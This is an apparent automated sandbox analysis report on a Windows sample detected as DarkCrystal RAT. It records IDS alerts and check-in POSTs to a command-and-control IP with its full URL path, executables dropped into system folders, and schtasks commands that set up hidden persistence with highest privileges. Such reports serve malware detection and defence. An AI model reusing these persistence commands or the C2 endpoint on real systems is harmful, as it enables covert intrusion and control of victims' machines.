Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49697 -> 83.217.209.253:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49703 -> 83.217.209.253:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49705 -> 83.217.209.253:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49700 -> 83.217.209.253:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49706 -> 83.217.209.253:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: INF-NET-ASRU INF-NET-ASRU

Source: global traffic	HTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253
Source: unknown	TCP traffic detected without corresponding DNS query: 83.217.209.253

Source: unknown

HTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1618971571.000000000314A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://83.217.209.253
Source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1618971571.000000000314A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://83.217.209.253/GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti
Source: m4n1AQRhaP.exe, 00000000.00000002.1329622101.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, m4n1AQRhaP.exe, 00000000.00000002.1329622101.00000000034BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1618971571.000000000314A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namev&

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\bcastdvr\uwTuxQS3V.exe	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\bcastdvr\uwTuxQS3V.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\bcastdvr\5b9faed1d091cf	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\SchCache\5afd0985fdd672	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\IME\en-GB\Registry.exe	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\IME\en-GB\Registry.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	File created: C:\Windows\IME\en-GB\ee2ad38f3d4382	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMP

Jump to behavior

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Code function: 0_2_00007FF88B4B0E84	0_2_00007FF88B4B0E84
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Code function: 0_2_00007FF88B66575D	0_2_00007FF88B66575D
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Code function: 0_2_00007FF88B662F9D	0_2_00007FF88B662F9D
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B528B33	25_2_00007FF88B528B33
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B4E0D6C	25_2_00007FF88B4E0D6C
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B4FAAAD	25_2_00007FF88B4FAAAD
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B4FC47D	25_2_00007FF88B4FC47D
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B4FAA50	25_2_00007FF88B4FAA50
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B4FC222	25_2_00007FF88B4FC222
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B4FC1D5	25_2_00007FF88B4FC1D5
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B4FBFF9	25_2_00007FF88B4FBFF9
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B538B33	27_2_00007FF88B538B33
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B4F0D6C	27_2_00007FF88B4F0D6C
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B50AAAD	27_2_00007FF88B50AAAD
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B50C47D	27_2_00007FF88B50C47D
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B50AA50	27_2_00007FF88B50AA50
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B50C222	27_2_00007FF88B50C222
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B50C1D5	27_2_00007FF88B50C1D5
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B50BFF9	27_2_00007FF88B50BFF9
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B6A5825	27_2_00007FF88B6A5825
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B6A575D	27_2_00007FF88B6A575D
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B6A2F9D	27_2_00007FF88B6A2F9D
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B4FAAAD	28_2_00007FF88B4FAAAD
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B4FC47D	28_2_00007FF88B4FC47D
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B4FAA50	28_2_00007FF88B4FAA50
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B4FC222	28_2_00007FF88B4FC222
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B4FC1D5	28_2_00007FF88B4FC1D5
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B4FBFF9	28_2_00007FF88B4FBFF9
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B528B33	28_2_00007FF88B528B33
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B4E0D6C	28_2_00007FF88B4E0D6C
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B4FAAAD	29_2_00007FF88B4FAAAD
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B4FC47D	29_2_00007FF88B4FC47D
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B4FAA50	29_2_00007FF88B4FAA50
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B4FC222	29_2_00007FF88B4FC222
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B4FC1D5	29_2_00007FF88B4FC1D5
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B4FBFF9	29_2_00007FF88B4FBFF9
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B528B33	29_2_00007FF88B528B33
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B4E0D6C	29_2_00007FF88B4E0D6C
Source: C:\Recovery\upfc.exe	Code function: 30_2_00007FF88B4D0D6C	30_2_00007FF88B4D0D6C
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B4D0D6C	31_2_00007FF88B4D0D6C
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B4EAAAD	31_2_00007FF88B4EAAAD
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B4EC47D	31_2_00007FF88B4EC47D
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B4EAA50	31_2_00007FF88B4EAA50
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B4EC222	31_2_00007FF88B4EC222
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B4EC1D5	31_2_00007FF88B4EC1D5
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B4EBFF9	31_2_00007FF88B4EBFF9
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B518B33	31_2_00007FF88B518B33
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B528C05	31_2_00007FF88B528C05
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4B0D6C	33_2_00007FF88B4B0D6C
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4CAAAD	33_2_00007FF88B4CAAAD
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4CC47D	33_2_00007FF88B4CC47D
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4CAA50	33_2_00007FF88B4CAA50
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4CC222	33_2_00007FF88B4CC222
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4CC1D5	33_2_00007FF88B4CC1D5
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4CBFF9	33_2_00007FF88B4CBFF9
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4F8B33	33_2_00007FF88B4F8B33
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 35_2_00007FF88B4FAAAD	35_2_00007FF88B4FAAAD
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 35_2_00007FF88B4FC47D	35_2_00007FF88B4FC47D
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 35_2_00007FF88B4FAA50	35_2_00007FF88B4FAA50
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 35_2_00007FF88B4FC222	35_2_00007FF88B4FC222
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 35_2_00007FF88B4FC1D5	35_2_00007FF88B4FC1D5
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 35_2_00007FF88B4FBFF9	35_2_00007FF88B4FBFF9
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 35_2_00007FF88B528B33	35_2_00007FF88B528B33
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 35_2_00007FF88B538C05	35_2_00007FF88B538C05
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 35_2_00007FF88B4E0D6C	35_2_00007FF88B4E0D6C
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 38_2_00007FF88B518B33	38_2_00007FF88B518B33
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 38_2_00007FF88B4EAAAD	38_2_00007FF88B4EAAAD
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 38_2_00007FF88B4EC47D	38_2_00007FF88B4EC47D
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 38_2_00007FF88B4EAA50	38_2_00007FF88B4EAA50
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 38_2_00007FF88B4EC222	38_2_00007FF88B4EC222
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 38_2_00007FF88B4EC1D5	38_2_00007FF88B4EC1D5
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 38_2_00007FF88B4EBFF9	38_2_00007FF88B4EBFF9
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 38_2_00007FF88B4D0D6C	38_2_00007FF88B4D0D6C
Source: C:\Windows\IME\en-GB\Registry.exe	Code function: 39_2_00007FF88B4F0D6C	39_2_00007FF88B4F0D6C
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 41_2_00007FF88B4E0D6C	41_2_00007FF88B4E0D6C
Source: C:\Recovery\upfc.exe	Code function: 42_2_00007FF88B4C0D6C	42_2_00007FF88B4C0D6C

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\ISkSYroH.log D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4

Source: m4n1AQRhaP.exe, 00000000.00000000.1266049330.0000000000732000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs m4n1AQRhaP.exe
Source: m4n1AQRhaP.exe, 00000000.00000002.1329058890.0000000002B30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs m4n1AQRhaP.exe
Source: m4n1AQRhaP.exe, 00000000.00000002.1332365600.0000000012D97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs m4n1AQRhaP.exe
Source: m4n1AQRhaP.exe, 00000000.00000002.1339029744.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs m4n1AQRhaP.exe
Source: m4n1AQRhaP.exe, 00000000.00000002.1335700228.000000001B59D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs m4n1AQRhaP.exe
Source: m4n1AQRhaP.exe, 00000000.00000002.1332365600.0000000012F99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs m4n1AQRhaP.exe
Source: m4n1AQRhaP.exe	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs m4n1AQRhaP.exe

Source: m4n1AQRhaP.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: m4n1AQRhaP.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: iHstGpVMr4QFhc62UUbis.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: uwTuxQS3V.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ikEtBZXIKU1m0Gn.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: upfc.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.cs	Cryptographic APIs: 'CreateDecryptor'
Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.cs	Cryptographic APIs: 'CreateDecryptor'
Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.cs	Cryptographic APIs: 'CreateDecryptor'
Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@42/44@0/1

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

File created: C:\Users\user\Desktop\mgFxlINb.log

Jump to behavior

Source: C:\Recovery\upfc.exe	Mutant created: NULL
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\ff43a303193c00a678de5ba4183d1959ec3f4e92d3123a05110d3de5f15d096e
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1252:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

File created: C:\Users\user\AppData\Local\Temp\ecdbob4x

Jump to behavior

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat"

Source: m4n1AQRhaP.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: m4n1AQRhaP.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: m4n1AQRhaP.exe	Virustotal: Detection: 72%
Source: m4n1AQRhaP.exe	ReversingLabs: Detection: 80%

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

File read: C:\Users\user\Desktop\m4n1AQRhaP.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\m4n1AQRhaP.exe "C:\Users\user\Desktop\m4n1AQRhaP.exe"
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Recovery\upfc.exe'" /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7C8.tmp" "c:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMP"
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbisi" /sc MINUTE /mo 7 /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbis" /sc ONLOGON /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbisi" /sc MINUTE /mo 12 /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uwTuxQS3Vu" /sc MINUTE /mo 8 /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uwTuxQS3V" /sc ONLOGON /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uwTuxQS3Vu" /sc MINUTE /mo 8 /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ikEtBZXIKU1m0Gni" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /f
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ikEtBZXIKU1m0Gn" /sc ONLOGON /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /rl HIGHEST /f
